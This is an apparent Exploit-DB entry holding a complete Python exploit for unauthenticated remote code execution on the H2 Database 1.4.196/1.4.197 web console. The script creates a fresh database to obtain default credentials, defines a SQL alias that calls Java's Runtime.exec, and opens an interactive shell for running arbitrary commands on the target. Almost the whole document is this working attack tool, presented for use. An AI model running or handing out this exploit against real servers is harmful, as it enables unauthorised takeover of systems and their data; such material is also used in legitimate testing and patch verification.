H2 Database 1.4.196 Remote Code Execution

`# Exploit Title: H2 Database 1.4.196 - Remote Code Execution  
# Google Dork: N/A  
# Date: 2018-09-24  
# Exploit Author: h4ckNinja  
# Vendor Homepage: https://www.h2database.com/  
# Software Link: http://www.h2database.com/h2-2018-03-18.zip  
# Version: 1.4.196 and 1.4.197  
# Tested on: macOS/Linux  
# CVE: N/A  
  
# This takes advantage of the CREATE ALIAS RCE (https://www.exploit-db.com/exploits/44422/).   
# When the test database has a password that is unknown, it is still possible to get the execution   
# by creating a new database. The web console allows this by entering the name of the new database   
# in the connection string. When the new database is created, the default credentials of   
# username asaa and password aa (blank) are created. The attacker is logged in automatically.   
# The attached Python code, modified from 44422, demonstrates this.  
  
#!/usr/bin/env python  
  
'''  
Exploit Title: Unauthenticated RCE  
Date: 2018/09/24  
Exploit Author: h4ckNinja  
Vendor: http://www.h2database.com/  
Version: all versions  
Tested on: Linux, Mac  
Description: Building on the Alias RCE, there's an authentication bypass to create a database, and then login to that one.  
Modified from: https://www.exploit-db.com/exploits/44422/  
'''  
  
import random  
import string  
import sys  
import argparse  
import html  
import requests  
  
  
def getSession(host):  
url = 'http://{}'.format(host)  
r = requests.get(url)  
path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('.jsp', '.do')  
  
return '{}/{}'.format(url, path)  
  
def login(url, database):  
data = {  
'language': 'en',  
'setting': 'Generic H2 (Embedded)',  
'name': 'Generic H2 (Embedded)',  
'driver': 'org.h2.Driver',  
'url': database,  
'user': 'sa',  
'password': ''  
}  
  
print('[*] Attempting to create database')  
r = requests.post(url, data=data)  
  
if '<th class="login">Login</th>' in r.text:  
return False  
  
print('[+] Created database and logged in')  
  
return True  
  
def prepare(url):  
cmd = '''CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : ""; }$$;'''  
url = url.replace('login', 'query')  
  
print('[*] Sending stage 1')  
  
r = requests.post(url, data={'sql': cmd})  
  
if not 'NullPointerException' in r.text:  
print('[+] Shell succeeded - ^c or quit to exit')  
return url  
  
return False  
  
def execve(url, cmd):  
r = requests.post(url, data={'sql':"CALL EXECVE('{}')".format(cmd)})  
  
try:  
execHTML = html.unescape(r.text.split('</th></tr><tr><td>')[1].split('</td>')[0].replace('<br />','\n').replace('&nbsp;',' ')).encode('utf-8').decode('utf-8','ignore')  
print(execHTML)  
  
except Exception as e:  
print('[-] Invalid command (' + str(e) + ')')  
  
  
if __name__ == "__main__":  
parser = argparse.ArgumentParser()  
randString = ''.join(random.choices(string.ascii_letters + string.digits, k=5))  
  
parser.add_argument('-H',  
'--host',  
dest='host',  
metavar='127.0.0.1:8082',  
help='Specify a host',  
required=True)  
  
parser.add_argument('-d',  
'--database-url',  
dest='database',  
metavar='jdbc:h2:~/emptydb-' + randString,  
default='jdbc:h2:~/emptydb-' + randString,  
help='Database URL',  
required=False)  
  
args = parser.parse_args()  
  
url = getSession(args.host)  
  
if login(url, args.database):  
success = prepare(url)  
  
if success:  
while True:  
try:  
cmd = input('h2-shell$ ')  
  
if 'quit' not in cmd:  
execve(success, cmd)  
  
else:  
print('[+] Shutting down')  
sys.exit(0)  
  
except KeyboardInterrupt:  
print()  
print('[+] Shutting down')  
sys.exit(0)  
  
else:  
print('[-] Something went wrong injecting the payload.')  
  
else:  
print('[-] Unable to login')  
  
  
`